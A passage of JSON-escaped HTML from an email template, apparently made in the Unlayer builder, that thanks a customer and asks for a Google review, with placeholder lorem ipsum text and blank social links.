!important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #363675; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #017ed0;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #017ed0;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747815584-a.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 26%;max-width: 150.8px;\\\" width=\\\"150.8\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 28px; line-height: 39.2px;\\\"><strong><span style=\\\"line-height: 39.2px; font-size: 28px;\\\">Thanks for being with us!<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 26px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747900373-ssss.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-size: 22px; line-height: 44px;\\\">Hi,<\\/span><br \\/><span style=\\\"font-size: 16px; line-height: 32px;\\\">Thank you again for choosing us for your lorem ipsum dolor. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-size: 16px; line-height: 32px;\\\">If you were happy with the efficiency of the service could I ask that you leave us some brief feedback on your experience via the link below.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:49px; v-text-anchor:middle; width:248px;\\\" arcsize=\\\"81.5%\\\" stroke=\\\"f\\\" fillcolor=\\\"#272362\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #272362; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"font-size: 16px; line-height: 19.2px;\\\"><strong><span style=\\\"line-height: 19.2px; font-size: 16px;\\\">Review us on Google<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595748338131-FWsY1nA.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 203px;\\\" width=\\\"203\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"84%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #272362; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\">Look forward to hearing from you <\\/span><br \\/><span style=\\\"font-size: 24px; line-height: 33.6px;\\\">in the near future.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 4px 4px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:254px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"254\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:254px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" \\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    